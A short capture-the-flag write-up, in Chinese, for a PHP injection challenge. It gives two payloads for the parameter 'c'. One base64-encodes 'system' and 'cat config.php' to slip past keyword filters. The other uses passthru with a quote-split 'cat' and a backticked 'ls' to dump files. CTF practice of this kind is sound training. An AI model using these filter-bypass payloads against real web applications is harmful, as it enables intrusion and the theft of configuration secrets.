ctf show 萌新web12
文件名也被过滤掉
base64绕过
构造paylaod
?c=$a=base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b);
得到flag
或者是
对于反引号 在Linux中,`` 作用是优先执行里面的内容,再把里面的内容传给外面的语句。所以构造:
c=passthru("ca''t `ls`");
